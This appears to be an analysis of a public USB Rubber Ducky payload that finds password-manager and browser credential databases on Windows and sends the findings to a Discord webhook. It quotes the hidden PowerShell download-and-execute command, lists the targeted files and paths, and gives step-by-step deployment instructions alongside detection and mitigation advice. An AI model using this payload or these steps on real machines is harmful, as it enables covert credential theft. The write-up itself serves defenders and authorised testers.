Vault Scanner – USB Rubber Ducky Payload Analysis

This document describes Vault Scanner, a keystroke injection payload for the USB Rubber Ducky. It automates the discovery of password manager database files on Windows systems and exfiltrates the findings to a Discord webhook. The payload is publicly available in the ex-cal1bur/usbrubberducky-payloads repository.

The attack requires physical access to the target machine. Once inserted, the Rubber Ducky enumerates as a Human Interface Device (HID), typically a keyboard. The operating system executes the injected keystrokes at high speed without user interaction.

Execution Flow

The Rubber Ducky runs a DuckyScript stored as inject.bin. The script performs the following steps:

  1. Opens the Windows Run dialog with GUI r.
  2. Launches PowerShell with the -WindowStyle Hidden parameter.
  3. Executes Invoke-Expression (Invoke-RestMethod '<URL>').

The <URL> points to a remote PowerShell script named Vault_Scanner.ps1. The script is downloaded and executed in memory without writing to disk. This evasion technique reduces forensic artifacts and bypasses simple file‑based detection.

Script Capabilities

Vault_Scanner.ps1 scans for database files belonging to more than ten password managers. The detection list includes:

  • KeePass (.kdbx)
  • Bitwarden (.json, .sqlite)
  • 1Password (.1pif, .sqlite)
  • LastPass (local cache files)
  • Dashlane (.db, .sqlite)
  • Enpass (.db, .sqlite)
  • NordPass (.db)
  • Keeper (.dat)
  • Firefox Lockwise (logins.json)
  • Chrome and Edge (Login Data SQLite databases)

The script searches standard user profile locations:

  • %APPDATA%
  • %LOCALAPPDATA%
  • %USERPROFILE%\Documents
  • %USERPROFILE%\Desktop

For each matching file, the script extracts: manager name, file name, full path, file size (bytes), and last write time (UTC).

Exfiltration via Discord Webhook

The script contains a hardcoded string WEBHOOK_URL_PLACEHOLDER. The operator replaces this with a valid Discord webhook URL before hosting the script. The collected findings are formatted into text blocks and sent as HTTP POST requests to discord.com/api/webhooks/<id>/<token>.

The script splits the output into chunks of 1,800 characters to respect Discord’s message length limit. Each chunk is sent as a separate message. No authentication other than the webhook token is required.

Configuration Steps

To deploy the payload:

  1. Edit Vault_Scanner.ps1 and replace WEBHOOK_URL_PLACEHOLDER with a working Discord webhook URL.
  2. Host the modified script on a web server accessible from the target machine (HTTP or HTTPS).
  3. Edit payload.txt and change example.com to the server’s domain or IP address.
  4. Compile payload.txt to inject.bin using PayloadStudio or the Java‑based duckencoder.
  5. Copy inject.bin to the Rubber Ducky’s microSD card (usually named DUCKY).

When the device is inserted, the payload executes without additional prompts. Windows 10 and 11 are supported. Default PowerShell execution policy (Restricted) does not block Invoke-Expression on downloaded content because the command runs in a single line without requiring a script file with an unrestricted policy.

Defensive Limitations

Keystroke injection attacks bypass most antivirus and EDR products because no binary, script file, or unusual process behavior appears initially. The PowerShell process is legitimate; the malicious activity occurs as commands typed by a «user.»

Detection opportunities arise at two points:

  • Network traffic to discord.com/api/webhooks from a non‑browser process.
  • Process creation of powershell.exe with the arguments -WindowStyle Hidden and Invoke-Expression (Invoke-RestMethod...).

Administrators can mitigate by:

  • Applying application whitelisting to restrict which executables can run from user‑writable locations.
  • Using PowerShell Constrained Language Mode or Device Guard.
  • Blocking outbound HTTPS traffic to known webhook domains unless explicitly required.
  • Monitoring for Run dialog activity followed by PowerShell commands (event ID 4688).

Repository References

The source code is available at:
https://github.com/ex-cal1bur/usbrubberducky-payloads/tree/master/payloads/library/recon/Vault_Scanner

The payload.txt and Vault_Scanner.ps1 files are included. No compilation is required for the PowerShell script, but the DuckyScript must be encoded to binary format for the Rubber Ducky.

Legal Notice

The repository includes a warning that the payload is intended for authorized penetration testing and educational purposes. Unauthorized deployment constitutes illegal access under computer misuse laws. Operators must obtain written permission before use.